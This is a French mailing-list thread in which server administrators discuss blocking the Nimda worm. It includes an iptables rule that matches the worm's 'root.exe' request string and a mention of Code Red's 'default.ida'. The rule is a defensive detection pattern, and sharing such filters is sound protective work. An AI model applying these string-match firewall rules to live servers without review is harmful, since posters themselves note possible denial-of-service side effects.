> A ce sujet, il n'y aurait pas moyen de limiter les dégats que fait ce > virus > sur nos serveurs en "occuppant" le virus lorsqu'il fait une requete. > Exemple, > créér un /scripts/root.exe en php ou cgi ou autre qui ferait betement un > sleep et ferait perdre du temps au virus? >> >> J'ai fait une erreur de copier/coller tout à l'heure. Pour IPTABLE voici la >> routine qui tue : >> >> # routine iptable pour filtrage http >> iptables -I INPUT -i eth0 -p tcp --tcp-flags ACK ACK --dport 80 -m string >> --string 'root.exe' -j REJECT --reject-with tcp-reset >> > > Est-ce que l'option "--reject-with tcp-reset" clos la connexion sur le > client et sur le serveur ? > > Si elle ne clos pas la connexion sur le serveur tu risques de te creer > un DoS, en epuisant le pool d'instance d'Apache utilisable. La connexion oui selon se que j'ai compris mais pas Apache. Comme, je n'ai pas de serveur online avec iptable, tout cela reste théorique pour moi. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: NIMDA
>> # routine iptable pour filtrage http >> iptables -I INPUT -i eth0 -p tcp --tcp-flags ACK ACK --dport 80 -m string >> --string 'root.exe' -j REJECT --reject-with tcp-reset > > > C'est surement très efficace, mais ça me semble un peu brutal de bloquer > une IP. Celle-ci peut être celle d'un proxy ou une adresse dynamique > et peut bloquer d'autres utilisateurs que l'utilisateur "virusé". > > Pour limiter ce risque, il faudrait associer à chaque blocage un timeout > pour qu'il ne soit effectif que pendant un laps de temps (1/4 d'heure > par exemple). > > Cela complique les scripts et peut demander d'avoir recours à un cron, > mais ce doit rester possible ;=) ... C'est effectivement le problème. J'ai regardé les IP. Il y a effectivement beaucoup de "NT" en frontal de lignes ADSL ou autres. 70% des IP n'ont pas de reverse dns. Sans compter que certaines IP sont en fait des points d'accès remote genre pop rtc des fournisseurs d'accès. C'est le problème de la méthode des script basés sur l'analyse des log Apache. Avec la chaîne iptables, il n'y a pas ce problème car la règle n'agit que si la chaîne du virus est trouvé. J'ai regardé avec ipchains mais je n'ai pas trouvé comment faire l'équivalent de la règle iptables. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: NIMDA
>>> A ce sujet, il n'y aurait pas moyen de limiter les dégats que fait ce virus >>> sur nos serveurs en "occuppant" le virus lorsqu'il fait une requete. >>> Exemple, >>> créér un /scripts/root.exe en php ou cgi ou autre qui ferait betement un >>> sleep et ferait perdre du temps au virus? J'ai fait une erreur de copier/coller tout à l'heure. Pour IPTABLE voici la routine qui tue : # routine iptable pour filtrage http iptables -I INPUT -i eth0 -p tcp --tcp-flags ACK ACK --dport 80 -m string --string 'root.exe' -j REJECT --reject-with tcp-reset Vous pouvez aussi en faire une autre pour codered avec default.ida (toujours là celui-là). Défaut, elle ferme salement le port. L'avantage c'est que cette routine est "temps réel" par rapport au filtrage de fichiers de logs Apache des autres routines. Pour infos, dans mon serveur le plus scanné, j'ai trouvé 544 IP contaminé pour la date du 25 septembre... Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
